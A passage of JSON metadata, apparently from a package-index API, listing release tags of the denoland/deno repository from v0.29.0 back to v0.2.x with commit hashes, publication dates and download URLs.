te.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6b